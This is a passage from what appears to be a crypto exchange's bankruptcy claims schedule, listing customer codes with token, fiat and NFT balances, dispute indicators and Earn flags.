| 07433328 | | BAT[13.74078233], BCH[.01282841], BRZ[1], CUSDT[947.68963604], GRT[26.36375721], NFT (568941166054113481/Saudi Arabia Ticket Stub #190)[1], SHIB[1], SUSHI[3.47252548], TRX[353.56984726], USD[433.07] | | |
| 07433329 | | USD[0.00], USDT[.99470557] | | |
| 07433331 | | BTC[0], ETH[.00000001], ETHW[0], MATIC[.36125741], TRX[0], USD[0.00] | | |
| 07433332 | | USD[0.01], USDT[0] | | |
| 07433336 | | CUSDT[1], USD[0.01] | Yes | |
| 07433339 | | CUSDT[8], LTC[8.54546121], USD[0.00] | Yes | |
| 07433351 | | DOGE[0], ETH[0], ETHW[0], USD[0.00], USDT[0] | | |
| 07433359 | | BTC[.00012835], CUSDT[498.91743363], DOGE[4], LINK[1.81102157], SUSHI[2.40241584], TRX[1418.36019941], USD[0.00] | | |
| 07433371 | | TRX[1], USDT[38.42217827] | | |
| 07433373 | | NFT (394609079028139137/Australia Ticket Stub #1672)[1], USD[2488.34] | | |
| 07433376 | | CUSDT[9.96406613], DOGE[117.43611592], USD[0.00] | | |
| 07433382 | | DOGE[1], USD[0.01] | | |
| 07433383 | | USD[10.90] | Yes | |
| 07433387 | | USD[500.00] | | |
| 07433388 | | BRZ[2], BTC[.00000051], CUSDT[4], DOGE[4.000548], TRX[3], USD[943.17] | Yes | |
| 07433390 | | USD[10.00] | | |
| 07433391 | | CUSDT[1], DOGE[11605.35443737], SOL[.00001891], TRX[3], USD[0.00] | | |
| 07433393 | | BRZ[1], BTC[.00687239], CUSDT[3], DOGE[2062.41184871], SHIB[2628120.8935611], TRX[3], USD[0.31] | | |
| 07433398 | | BTC[0], CUSDT[1], TRX[1] | | |
| 07433399 | | USD[0.23] | | |
| 07433400 | | SOL[0] | | |
| 07433402 | | SOL[0], TRX[0], USD[0.00] | | |
| 07433404 | | AVAX[0], BAT[2], BCH[0], BRZ[1], DOGE[3], ETH[0], ETHW[0], KSHIB[0], MATIC[0], SHIB[12], SOL[0], TRX[3], USD[0.01], USDT[0] | Yes | |
| 07433405 | | DOGE[121.61082672], TRX[56.85762679], USD[0.00] | | |
| 07433410 | | BAT[1], CUSDT[4], DOGE[0], ETH[.00002628], ETHW[.00002628], LINK[0], TRX[1], USD[0.00] | | |
| 07433411 | | SOL[.09] | | |
| 07433413 | | BCH[.01171049], BRZ[1], BTC[.00008325], CUSDT[48], TRX[1], USD[0.00], USDT[0], YFI[.00012715] | | |
| 07433418 | | BAT[8.3868667], BRZ[.00126673], CUSDT[2], DOGE[7.57313403], TRX[130.48398447], UNI[.00001179], USD[0.00], USDT[0.00037064] | | |
| 07433420 | | USD[0.23] | | |
| 07433421 | | ETH[0], ETHW[0.03570606], SHIB[0], USD[80.99] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07433422 | | NFT [3120422430380108401040/Entrance Voucher #25373][1] | | |
| 07433424 | | BTC[.00198801], CUSDT[2], DOGE[384.93737396], ETH[.01564085], LINK[.99007622], TRX[1], USD[0.00] | | |
| 07433427 | | BRZ[1], BTC[0], DOGE[86.07415401], ETH[0], LTC[0], SOL[0], TRX[0], USD[0.00] | Yes | |
| 07433439 | | BAT[80.61697541], BRZ[1], BTC[.00101066], CUSDT[5], DOGE[7], ETH[.2], ETHW[.2], GRT[347.7179616], LINK[1.1261144], LTC[.05455097], SOL[5.00003388], TRX[427.84984155], UNI[1.07438799], USD[0.72] | | |
| 07433448 | | BAT[1], CUSDT[2], DOGE[1926.20131905], USD[0.00] | | |
| 07433449 | | TRX[1], USD[365.79], USDT[0] | Yes | |
| 07433453 | | BTC[.00036074], DOGE[107.18730601], ETH[.01502538], ETHW[.01502538], SOL[.78251993], TRX[73.02529699], USD[0.16] | | |
| 07433455 | | CUSDT[6], DOGE[0], SOL[.11371178], USD[0.00] | Yes | |
| 07433459 | | CUSDT[3], DOGE[2], ETH[0.00033438], ETHW[0.00033438], USD[11.63] | Yes | |
| 07433464 | | CUSDT[1], SHIB[3.5741528], USD[0.00] | Yes | |
| 07433466 | | USD[0.30] | | |
| 07433469 | | USD[230.00] | | |
| 07433470 | | BTC[.01922279], DOGE[1], USD[0.00] | | |
| 07433472 | | TRX[1], USD[0.00] | Yes | |
| 07433473 | | CUSDT[1], DOGE[591.43774546], USD[0.00] | | |
| 07433477 | | CUSDT[1], USD[0.00], USDT[1] | | |
| 07433478 | | BTC[.00146411], CUSDT[2], DOGE[159.96928629], ETH[.05783286], ETHW[.05783286], LTC[.31972006], SOL[2.43479409], TRX[3], USD[19.80], USDT[19.90154476] | | |
| 07433480 | | USD[0.00] | | |
| 07433484 | | BRZ[2], CUSDT[23], DOGE[.00001919], TRX[4], USD[0.00] | | |
| 07433487 | | BAT[1], BRZ[4], BTC[.10475508], CUSDT[2], DOGE[4], GRT[2], SHIB[10578320.43186047], SOL[50.37853567], TRX[5], USD[1.64] | | |
| 07433490 | | DOGE[12.46034774], USD[0.00], YFI[.00031066] | | |
| 07433491 | | CUSDT[1], DOGE[2], GBP[35.95], TRX[120.7895773], USD[10.00], YFI[.00062468] | | |
| 07433493 | | CUSDT[1], DOGE[68.60611394], USD[0.00] | | |
| 07433497 | | BTC[0], CUSDT[1], DOGE[0], ETH[0], USD[0.00], USDT[0] | Yes | |
| 07433498 | | TRX[680.40035038], USD[0.00] | | |
| 07433500 | | BTC[.00000001], CUSDT[1], USD[0.01], USDT[0.00000002] | | |
| 07433505 | | BRZ[1], CUSDT[4], DOGE[.00537642], TRX[1], USD[0.01] | | |
| 07433507 | | BAT[1], BTC[.00002732], CUSDT[3], DOGE[.81553375], TRX[2], USD[0.31] | | |
| 07433509 | | USD[1.55] | | |
| 07433510 | | BTC[.03231577], DOGE[11433.63352711], ETH[.07763639], ETHW[.07763639], SHIB[2611495.64953026], USD[0.07] | | |
| 07433511 | | USD[17.52] | Yes | |
| 07433513 | | USD[4.51], USDT[0] | Yes | |
| 07433519 | | BAT[1.00408139], BRZ[4], BTC[.3057951], CUSDT[13.19773174], DOGE[554.72016547], ETH[1.64999068], ETHW[1.64929768], GRT[1], LINK[20.46212259], SHIB[8], TRX[11], USD[0.00], USDT[2.13946889] | Yes | |
| 07433522 | | BRZ[4], CUSDT[2], DOGE[68.20511415], GRT[1], TRX[3], USD[0.00] | | |
| 07433525 | | BRZ[1], CUSDT[3], DOGE[1.19434589], ETH[.00001407], ETHW[.0001407], GRT[1.00401215], LINK[1.09812786], TRX[2], USD[0.00], USDT[1.10159336] | Yes | |
| 07433530 | | CUSDT[1], DOGE[2], TRX[1], USD[0.00] | | |
| 07433532 | | ETH[0], LINK[0], NFT [4623486106272315668/Imola Ticket Stub #2416][1], NFT [5526822843690009502/Barcelona Ticket Stub #118][1], USD[0.00] | Yes | |
| 07433535 | | DOGE[1], ETH[0], ETHW[0], TRX[1], USD[0.00] | | |
| 07433536 | | BAT[1.0165555], BRZ[3], CUSDT[5], GRT[4.25472106], TRX[5], USD[0.68], USDT[4.42985532] | Yes | |
| 07433538 | | FTX_EQUITY[0], USD[0.01], WEST_REALM_EQUITY_POSTSPLIT[0] | | |
| 07433540 | | DOGE[2267.22950857], TRX[1], USD[0.19] | | |
| 07433549 | | CUSDT[2], DOGE[12239.05712444], ETH[0], NFT [3754765405497066443/3D CATPUNK #1857][1], SHIB[3], SOL[3.01903706], USD[0.00], USDT[0.00003541] | Yes | |
| 07433552 | | DOGE[1], USD[1.00], USDT[0] | | |
| 07433555 | | BAT[2], BTC[0], CUSDT[2], DOGE[11729.78830474], GRT[1], SHIB[1], TRX[1], USD[0.01], USDT[5.00964398] | Yes | |
| 07433564 | | CUSDT[3], DOGE[5], USD[0.00] | | |
| 07433574 | | CUSDT[3], DOGE[1], USD[0.01] | | |
| 07433576 | | CUSDT[3], DOGE[.70938192], TRX[1], USD[2.62] | | |
| 07433582 | | AAVE[0], ALGO[.861], AVAX[0.03221096], BCH[0.00007281], BTC[0], DAI[0], DOGE[0.90530908], ETH[0], ETHW[0.00042198], GRT[0.79508008], LINK[0.05785394], LTC[0.00040694], MATIC[0.08947566], MKR[0.00013780], NEAR[.0854], SOL[0.00072900], SUSHI[0.08812715], TRX[0.94206697], UNI[0.02305136], USD[0.00], USDT[0.00000001], YFI[0.00001049] | | |
| 07433583 | | BTC[.0009963], USD[156.43] | | |
| 07433588 | | BAT[14.4336205], CUSDT[522.97520668], DOGE[1134.20939398], ETH[.00764213], ETHW[.00764213], TRX[383.7967361], USD[0.00], USDT[53.78653438] | Yes | |
| 07433590 | | BRZ[3.00000001], BTC[0], CUSDT[18.00000001], DOGE[7.12372556], ETH[0], ETHW[0], LINK[.00000001], SHIB[2264097.46349829], SOL[0.00000001], TRX[4], USD[0.00] | Yes | |
| 07433594 | | CUSDT[4], DOGE[399.6117636], TRX[1], USD[0.82] | | |
| 07433599 | | BRZ[1], BTC[0], CUSDT[9], DOGE[1], SOL[0], SUSHI[0], USD[0.64], USDT[0] | | |
| 07433604 | | BRZ[3], CUSDT[8], DOGE[7939.61000138], ETH[.26304308], ETHW[.26284628], LTC[2.17440022], SHIB[4], SOL[4.39735627], TRX[3], USD[0.01] | Yes | |
| 07433606 | | BTC[.00025158], DOGE[1], USD[0.00] | | |
| 07433609 | | BTC[.00959645], TRX[1], USD[0.00] | | |
| 07433616 | | CUSDT[3], DOGE[0], ETH[0], TRX[1], USD[0.00], USDT[1] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07433618 | | BF_POINT[100], BRZ[1], BTC[.00611001], CUSDT[8], DOGE[275.0511378], ETH[.14275513], ETHW[.14184773], GBP[0.00], SOL[.08973786], SUSHI[.00012856], TRX[4], USD[0.00] | Yes | |
| 07433619 | | CUSDT[2], DOGE[132.53473556], TRX[593.0472094], USD[0.00] | | |
| 07433623 | | CUSDT[1], DOGE[3.92970432], SUSHI[.00088466], USD[0.00], USDT[0] | | |
| 07433627 | | CUSDT[13], SOL[0], TRX[3], USD[0.00], USDT[0] | Yes | |
| 07433630 | | BTC[.00067255] | | |
| 07433631 | | AAVE[.68916963], BAT[1], BRZ[1], BTC[.00000283], CUSDT[30], DOGE[339.01258735], ETH[.10287835], ETHW[0.65652446], NFT (427402395886147441/Barcelona Ticket Stub #100)[1], NFT (519072710461453294/Saudi Arabia Ticket Stub #1342)[1], SHIB[18], SOL[6.8098102], TRX[7], USD[12.15] | | |
| 07433636 | | CUSDT[0], DOGE[0], ETH[0.00000001], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07433641 | | AAVE[.01817], BAT[2.797], DOGE[.616], GRT[10.02589684], MATIC[1.14], MKR[.001043], SUSHI[.326], TRX[.02], USD[0.07] | | |
| 07433648 | | BAT[1], CUSDT[1], TRX[1], USD[0.01], USDT[0] | | |
| 07433652 | | BRZ[2], DOGE[1], GRT[1.00367791], KSHIB[14.61633328], SHIB[1], TRX[7.92739344], USD[0.00] | Yes | |
| 07433659 | | CUSDT[2], DOGE[191.18403432], USD[0.00] | | |
| 07433661 | | CUSDT[2], DOGE[543.34180926], TRX[3], USD[0.00] | | |
| 07433667 | | BRZ[1], CUSDT[2], DOGE[2324.56590247], ETH[.41193791], ETHW[.41193791], TRX[3], USD[0.00] | | |
| 07433668 | | CUSDT[7], USD[0.00] | | |
| 07433670 | | DOGE[.00000467], TRX[1], USD[38.47] | Yes | |
| 07433676 | | CUSDT[1], DOGE[2], TRX[386.989012], USD[-0.66], USDT[0.00922750] | | |
| 07433680 | | USD[0.00], USDT[0] | | |
| 07433681 | | DOGE[20.979], SHIB[699300], USD[0.98], USDT[0.86075308] | | |
| 07433686 | | CUSDT[1], GRT[1], USD[0.01] | | |
| 07433689 | | CUSDT[1], DOGE[1583.11269453], LTC[0.00020066], TRX[1], USD[0.00] | Yes | |
| 07433692 | | SOL[.37687875], USD[0.02] | | |
| 07433694 | | BRZ[2], CUSDT[4], DOGE[4], ETH[0], ETHW[0], TRX[2], USD[0.00] | Yes | |
| 07433698 | | BTC[0], DOGE[0], ETH[0], ETHW[0], USD[0.00], USDT[4.00714451] | | |
| 07433701 | | BRZ[1], CUSDT[1], DOGE[3164.77746681], KSHIB[1539.06512994], USD[0.01] | Yes | |
| 07433705 | | CUSDT[17], DAI[.00000066], DOGE[4.13168049], LINK[.00000052], LTC[.00000067], MATIC[.00004927], NFT (363464729903350401/Cute Axolotls Collection #20)[1], SHIB[560.57333588], SOL[.00000073], TRX[1.00000663], USD[0.00] | | |
| 07433707 | | BAT[2.01569993], BRZ[3], CUSDT[9], DOGE[1], SUSHI[.00004691], USD[0.01], USDT[0] | Yes | |
| 07433710 | | DOGE[53.27324497], USD[1.60] | | |
| 07433711 | | USDT[.3581076] | | |
| 07433714 | | TRX[1], USDT[0] | | |
| 07433716 | | BAT[.7947147], BRZ[3], CUSDT[10], ETH[0], LTC[0.00039707], TRX[1.2950066], USD[0.33] | | |
| 07433721 | | BTC[.0001549], ETH[.000768], ETHW[.000768], NFT (413762090648594687/Bahrain Ticket Stub)[1], NFT (431049141167287783/Entrance Voucher #3657)[1], NFT (448747241208196780/Romeo #1007)[1], SHIB[14886900], SOL[.00846], USD[523.63] | | |
| 07433722 | | CUSDT[4], DOGE[1], USD[0.00] | | |
| 07433723 | | USD[0.00] | | |
| 07433730 | | USD[0.00] | | |
| 07433733 | | CUSDT[3], DOGE[.00047282], TRX[1.00001286], USD[0.00] | | |
| 07433735 | | BTC[.00162454], CUSDT[4], DOGE[2], SHIB[535523.02749018], TRX[2], UNI[3.22750574], USD[0.00] | | |
| 07433756 | | BTC[0.50000000], ETH[0], ETHW[0], USD[0.01], USDT[0] | | |
| 07433758 | | BTC[0], USD[0.00] | | |
| 07433761 | | CUSDT[1], USD[0.00] | | |
| 07433767 | | BTC[.00137597], CUSDT[2], DOGE[93.71357704], USD[0.00] | | |
| 07433768 | | BCH[2.70647442], CUSDT[1], LTC[6], TRX[7126.44586463], USD[636.70], USDT[1] | | |
| 07433780 | | USD[12.00] | | |
| 07433781 | | USD[0.01] | | |
| 07433785 | | USD[0.01], USDT[0] | | |
| 07433786 | | BTC[0], LTC[0], SOL[0], USD[0.00] | | |
| 07433787 | Contingent, Disputed | DOGE[2.07571018], USD[0.00], USDT[0.00001358] | | |
| 07433802 | | BTC[0], DOGE[0], ETH[0], LINK[0], LTC[0], USD[0.01] | | |
| 07433805 | | AVAX[0.00113892], ETH[.25], ETHW[.25], SOL[41.08689027], TRX[.895331], USD[-349.89], USDT[129.30641624] | | |
| 07433806 | | BRZ[1], CUSDT[4], ETH[0], USD[0.00] | | |
| 07433808 | | SOL[.995], SUSHI[10.989], USD[4.28] | | |
| 07433811 | | BTC[0], ETH[0.00000001], LINK[.00000001], LTC[0], SOL[0], USD[11.01], WBTC[0] | | |
| 07433823 | | ETH[.000525], ETHW[.000525], USD[2244.29], USDT[0] | | |
| 07433832 | Contingent, Disputed | CUSDT[1], USD[0.00], USDT[0] | Yes | |
| 07433835 | | GRT[1], USD[0.00] | | |
| 07433837 | | BAT[4.63041336], BTC[.00202856], CUSDT[4], DOGE[6], ETH[.00997256], ETHW[.00997256], LTC[.10095558], TRX[183.86300906], USD[0.00] | | |
| 07433849 | | BTC[0], USD[0.00] | | |
| 07433856 | | DOGE[.71403658], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07433861 | | BRZ[1], CUSDT[27], DOGE[41.00037302], ETH[.14197293], ETHW[.14197293], LTC[1.35395738], SOL[12.80919817], TRX[4], USD[0.00] | | |
| 07433865 | | BTC[.00000003], ETH[.03035912], ETHW[.03035912], SOL[.09751087], USD[61.32], USDT[31.62] | | |
| 07433867 | | DOGE[2159.44480608], USD[0.00] | | |
| 07433870 | Contingent, Disputed | BTC[0.00000015], ETH[0], USD[0.00] | | |
| 07433872 | | CUSDT[1], DOGE[95.15823482], USD[0.00] | | |
| 07433875 | | BTC[0.00009350], DOGE[0], ETH[0], MATIC[0], SOL[.00000001], TRX[0], USD[0.00] | Yes | |
| 07433878 | | BRZ[1], CUSDT[1], DOGE[2], ETH[.09938771], ETHW[.09835943], LINK[4.02740391], SOL[11.55863632], TRX[1674.55342549], USD[0.00] | Yes | |
| 07433879 | | TRX[1], USD[0.00] | Yes | |
| 07433881 | | BAT[44.58696372], BRZ[1], BTC[.00904367], DOGE[43787.0317931], TRX[775.44356608], USD[0.82], USDT[1] | | |
| 07433892 | | BRZ[1], CUSDT[5], DOGE[1], LINK[.73618066], TRX[1], USD[66.44] | | |
| 07433894 | | BTC[0.00001002], DOGE[0], ETH[0], ETHW[0], SHIB[10], USD[0.00] | Yes | |
| 07433895 | | CUSDT[5], USD[0.01] | Yes | |
| 07433896 | | BAT[0], BCH[0], BTC[0], DOGE[57.43504418], ETH[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0], USD[0.19], USDT[0], YFI[0] | | |
| 07433898 | Contingent, Disputed | USD[0.00] | | |
| 07433900 | | BRZ[1], CUSDT[7], DOGE[.00003126], TRX[1], USD[0.00] | | |
| 07433904 | | BAT[1.0165555], BRZ[6.60219938], CUSDT[7], DOGE[1], GRT[3.17409624], KSHIB[7118.76520746], LINK[2.20721417], TRX[13.49607795], USD[534.05], USDT[3.31082118] | Yes | |
| 07433908 | | SHIB[15758.12365102], USD[0.00], USDT[0] | | |
| 07433912 | | BTC[.00046985], CUSDT[2], ETH[.0143696], ETHW[.0143696], TRX[1], USD[0.20] | | |
| 07433919 | | ETH[0], ETHW[0], SHIB[2], USD[0.00] | | |
| 07433921 | | DOGE[2], USD[0.00] | Yes | |
| 07433927 | | BAT[1], BRZ[1], CUSDT[6], DOGE[.94578462], TRX[1], USD[0.01] | | |
| 07433928 | | BTC[0], DOGE[1791.96913174], ETH[0], ETHW[0], SHIB[2269166.5784072], SOL[5.01775011], TRX[235.97689403], USD[11.82], USDT[0.00000001] | Yes | |
| 07433931 | | DOGE[93.34420357], USD[0.00] | | |
| 07433932 | | BTC[.00009407], USD[0.00] | | |
| 07433933 | | ETH[.00000334], ETHW[.36593728], USD[0.00], USDT[1.08856256] | Yes | |
| 07433940 | | USD[0.00] | | |
| 07433947 | | BAT[1], CUSDT[2], DOGE[.00001355], USD[0.90] | | |
| 07433949 | | USD[0.05] | | |
| 07433952 | | BTC[.0133692] | | |
| 07433954 | | BRZ[1], CUSDT[15], DOGE[0], GRT[1], LINK[0], TRX[67.58460713], USD[0.39], USDT[1] | | |
| 07433956 | | BTC[0], DOGE[0], ETH[.00541796], ETHW[12.082162], GRT[.49877], SHIB[10986243], USD[6.07] | | |
| 07433958 | | BF_POINT[200], DOGE[1], USD[0.00] | Yes | |
| 07433964 | | USD[0.00] | | |
| 07433966 | | CUSDT[1], DOGE[42.50529076], ETH[.11689863], ETHW[.11576605], USD[0.00] | Yes | |
| 07433967 | | DOGE[3], SOL[0], USD[0.00], USDT[0] | Yes | |
| 07433970 | | CUSDT[2], USD[0.01] | | |
| 07433977 | | USD[0.01] | Yes | |
| 07433983 | | BTC[0], USD[0.34] | | |
| 07433988 | | SUSHI[.00000001], TRX[.00009], USD[0.01], USDT[0.00000001] | | |
| 07433989 | | USDT[0] | | |
| 07433993 | | BRZ[1], DOGE[269.34985985], USD[9.32] | | |
| 07433994 | | BF_POINT[200], BTC[0], DOGE[0], ETH[0], USD[0.00] | Yes | |
| 07433995 | | BRZ[1], CUSDT[1], USD[0.00] | Yes | |
| 07434000 | | DOGE[7.992], USD[0.08], USDT[0.09945173] | | |
| 07434006 | | USD[0.00], USDT[0] | Yes | |
| 07434012 | | BTC[.00108693], CUSDT[7], DOGE[1285.40620229], USD[0.00] | Yes | |
| 07434022 | | NEAR[0.00368116], SOL[0], USD[0.00] | | |
| 07434023 | | SOL[1.30091173], USD[0.00] | | |
| 07434026 | | BTC[0], CUSDT[2], GRT[1], TRX[2], USD[0.00] | | |
| 07434029 | | BTC[.00909408], DOGE[301.62588867], ETH[.05238694], ETHW[.05173618], LTC[2.49156684], SHIB[609729.11756267], USD[0.00] | Yes | |
| 07434030 | | USD[0.00] | | |
| 07434036 | | CUSDT[3], USD[0.00] | | |
| 07434037 | | AUD[0.00], DOGE[647.35420619], ETH[.02827394], ETHW[.02827394], USD[0.00] | | |
| 07434039 | | SOL[0] | | |
| 07434043 | | BRZ[4], BTC[0], CUSDT[43], DOGE[5], TRX[6], USD[0.00] | | |
| 07434044 | | DOGE[0], ETH[0], USD[0.01], YFI[0] | Yes | |
| 07434045 | | BTC[0], DOGE[0], SHIB[1], TRX[2], USD[0.00], USDT[0] | | |
| 07434050 | | CUSDT[1], DOGE[32.27734519], ETH[.0063853], ETHW[.0063853], LINK[.38500381], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07434052 | | USD[0.00], USDT[0] | | |
| 07434053 | | BRZ[1], CUSDT[5], DOGE[1], TRX[4], USD[0.00] | | |
| 07434055 | | USD[0.00], USDT[23.86577624] | | |
| 07434057 | | TRX[.45388] | | |
| 07434069 | | USD[0.05] | | |
| 07434070 | | CUSDT[1], SHIB[22668.64182159], USD[0.00] | | |
| 07434075 | | BF_POINT[100], BTC[.00000003], DOGE[2.01974567], ETHW[.00000005], SHIB[.00025485], USD[0.01], USDT[1.0001826] | Yes | |
| 07434087 | | USD[0.36] | | |
| 07434089 | | BAT[1.0165555], BRZ[1], BTC[.00000008], CUSDT[19], DOGE[3], LINK[0], NFT (31161746578465815/Doak Walker's Playbook: Texas vs. SMU - November 1, 1947 #56)[1], TRX[11.62534683], USD[0.01] | Yes | |
| 07434090 | | BRZ[1], CUSDT[1], DOGE[.38286878], USD[0.66] | | |
| 07434091 | | USD[0.00], USDT[0] | Yes | |
| 07434092 | | CUSDT[1], USD[0.00] | | |
| 07434096 | | CUSDT[1], DOGE[0], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07434105 | | CUSDT[2], DOGE[.00002401], TRX[2], USD[0.10] | | |
| 07434106 | | USD[9.63] | | |
| 07434107 | | BTC[.0000598] | | |
| 07434113 | | AAVE[.006148], ETHW[.689], LINK[.05136], LTC[.00620803], SUSHI[.3252], TRX[.0748], USD[0.00], USDT[1.62573058] | | |
| 07434115 | | AVAX[0], DOGE[0], ETH[0], SHIB[0], SOL[.00457926], TRX[1.52833178], USD[3.50], USDT[0], YFI[0] | | |
| 07434123 | | BTC[.00000174], CUSDT[26], DOGE[910.16993159], ETH[.04416677], ETHW[.04361957], TRX[20.85337577], UNI[1.14102566], USD[0.00] | Yes | |
| 07434126 | | ETH[.00010529], ETHW[.00010529], USD[1.74] | | |
| 07434128 | | BRZ[1], CUSDT[3], DOGE[1], TRX[1], USD[0.00] | Yes | |
| 07434133 | | NEAR[94.210415], USD[0.70] | | |
| 07434135 | | DOGE[1], ETH[1.00002959], ETHW[1.00002959], TRX[10967.41238628], USD[0.00], USDT[1] | | |
| 07434137 | | ETH[0], SOL[0], USD[0.00] | | |
| 07434139 | | DOGE[841.6597382], USD[0.02] | Yes | |
| 07434142 | | USD[51.24], USDT[0.00265821] | | |
| 07434146 | | CUSDT[1], ETH[.02878831], ETHW[.02878831], TRX[1], USD[0.00] | | |
| 07434150 | | BAT[1], BRZ[2], CUSDT[1], DOGE[1.00005748], GRT[2], TRX[2], USD[0.01], USDT[0] | | |
| 07434151 | | BRZ[1], DOGE[2], USD[0.01] | Yes | |
| 07434154 | | SOL[1.77996841], USD[0.20] | | |
| 07434159 | | BTC[.0000444], DOGE[.816], SOL[.0896] | | |
| 07434162 | | BAT[0], DOGE[3], GRT[0], TRX[1], USD[0.00], USDT[0] | | |
| 07434165 | | BCH[0], BTC[0], DOGE[0], SHIB[5], USD[0.00], USDT[0.00000001] | | |
| 07434167 | | DOGE[34.72132869], USD[0.06], USDT[0.00216713] | Yes | |
| 07434170 | | USD[0.00] | | |
| 07434172 | | BRZ[1], CUSDT[6], ETH[0.05061034], ETHW[0.05061034], USD[0.00] | | |
| 07434174 | | CUSDT[1], USD[0.00] | | |
| 07434179 | | BAT[1], BTC[.21124887], CUSDT[2], DOGE[1.19912967], GRT[2], LINK[2], SHIB[30590394.61609054], SUSHI[1], TRX[3], UNI[1], USD[0.00], USDT[2] | | |
| 07434185 | | CUSDT[2], DOGE[390.18466765], TRX[1560.15318025], USD[31.44] | | |
| 07434195 | | BAT[0], BCH[0], BRZ[9], CUSDT[19], DAI[0], DOGE[2], ETH[0], GRT[0], LINK[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0], YFI[0] | | |
| 07434198 | | ETH[0], TRX[0], USD[0.00], USDT[0] | | |
| 07434199 | | AUD[0.00], BRZ[.996], CAD[1.00], DOGE[.184], EUR[1.00], GBP[1.00], TRX[.76], USD[101.37], USDT[0] | | |
| 07434200 | | BAT[1], BRZ[13], CUSDT[32], DOGE[0], GRT[1], USD[0.00], USDT[3] | | |
| 07434213 | | CUSDT[2], TRX[2], USD[0.00] | | |
| 07434214 | | BRZ[1], CUSDT[2], DOGE[0], ETH[0], MATIC[.00022021], SHIB[5], USD[0.00], USDT[0] | Yes | |
| 07434219 | | CUSDT[1], USD[0.00] | | |
| 07434220 | | ETH[.0003], ETHW[.0003], SOL[1.494], USD[0.00] | | |
| 07434225 | | CUSDT[1], DOGE[766.71007421], LTC[.00006348], SUSHI[13.70693213], TRX[1], USD[0.00] | | |
| 07434227 | | SUSHI[.4215], USD[8.39] | | |
| 07434228 | | USD[0.00], USDT[0] | | |
| 07434233 | | GRT[48.804], USD[0.02] | | |
| 07434237 | | USD[0.00] | | |
| 07434239 | | BTC[0], DOGE[0], ETH[0], TRX[0], USD[0.00] | | |
| 07434240 | | BRZ[3], CUSDT[5], DOGE[4], SHIB[1], TRX[10], USD[0.01], USDT[1] | | |
| 07434242 | | CUSDT[1], DOGE[410.0756681], SOL[4.17938341], USD[0.00] | | |
| 07434243 | | CUSDT[1], DOGE[57.72798062], TRX[1], USD[0.00] | | |
| 07434246 | | BTC[.00182304] | | |
| 07434249 | | BTC[0], USD[0.00], USDT[.00040203] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07434250 | | BAT[1], CUSDT[1], USD[0.00] | | |
| 07434254 | | BAT[24.97625], DOGE[.525], GRT[14.98575], LINK[2.297815], LTC[.1898195], SOL[3.18784], TRX[552.891], UNI[1.898195], USD[0.07], USDT[2.97663485] | | |
| 07434255 | | CUSDT[3], DOGE[5], ETH[0], SOL[.00003288], TRX[2], USD[0.00] | | |
| 07434259 | | BAT[351.82281931], BRZ[1], BTC[.01808735], CUSDT[2342.40603305], DOGE[1859.09221327], ETH[.20579039], ETHW[.20579039], TRX[760.31666359], USD[0.00] | | |
| 07434260 | | USD[0.00] | | |
| 07434263 | | CUSDT[3], DOGE[125.68749093], USD[0.74], USDT[0.75517468] | | |
| 07434264 | | CUSDT[.01864297], DOGE[.00001358], TRX[.00009826], USD[0.00], USDT[0] | | |
| 07434266 | | BTC[0], DOGE[3.000548], ETH[0], GRT[0], LTC[0], SHIB[2], TRX[1], USD[0.00], USDT[0.00123969] | Yes | |
| 07434275 | | BRZ[1], CUSDT[1], DOGE[3], USD[0.01] | | |
| 07434276 | | ETH[.0006428], ETHW[.0006428], SOL[.00531985], USDT[.21841] | | |
| 07434278 | | BTC[0.00000001], USD[0.00] | | |
| 07434282 | | BTC[0], DOGE[951.09188989], LINK[0], LTC[0], SOL[0], USD[0.00] | | |
| 07434284 | | BTC[0], ETH[.00000001], ETHW[0], USD[0.00], USDT[.0016] | | |
| 07434287 | | BTC[.00036512], CUSDT[3], DOGE[1], ETH[.00383318], ETHW[.00383318], USD[33.37] | | |
| 07434289 | | BRZ[2], CUSDT[8], DOGE[1], ETH[3.57239783], ETHW[3.57089745], SHIB[0], SOL[0], TRX[1577.51700130], USD[0.01], USDT[0] | Yes | |
| 07434307 | | BTC[.00306221], CUSDT[6], DOGE[374.37286997], ETH[.31468475], ETHW[.17775436], LINK[2.80185222], LTC[.17938767], SHIB[1496614.91390237], TRX[1053.39513608], USD[0.01] | Yes | |
| 07434310 | | BAT[2.11681806], BRZ[2], CUSDT[16], DOGE[2], ETH[0.01342092], ETHW[0.01325676], GRT[1.00405388], LTC[.00004565], TRX[16.06227947], USD[0.00], USDT[1.10215666] | Yes | |
| 07434312 | | CUSDT[19], ETH[.00000001], ETHW[0], SOL[0], TRX[2], USD[0.01] | Yes | |
| 07434314 | | BTC[.02024982], DOGE[128.871] | | |
| 07434317 | | AAVE[.0032137], BTC[.00004217], SOL[.0789], USD[2.06] | | |
| 07434321 | | GRT[8.964], USD[1.06] | | |
| 07434327 | | ETH[0], ETHW[0], USD[0.00] | | |
| 07434335 | | BAT[83.12255408], BRZ[2], CUSDT[5], DOGE[2], GRT[40.12345945], SOL[11.27986604], SUSHI[4.08077058], TRX[3], USD[0.00], USDT[1.05560969] | Yes | |
| 07434336 | | BTC[.06266984], ETH[.700625], ETHW[.700625], USD[1.98], USDT[0] | | |
| 07434339 | | TRX[1], USD[199.90] | | |
| 07434361 | | USD[6320.01] | | |
| 07434364 | | SOL[26.27899558], TRX[1], USD[300.00] | | |
| 07434375 | Contingent, Disputed | USD[0.00], USDT[0] | | |
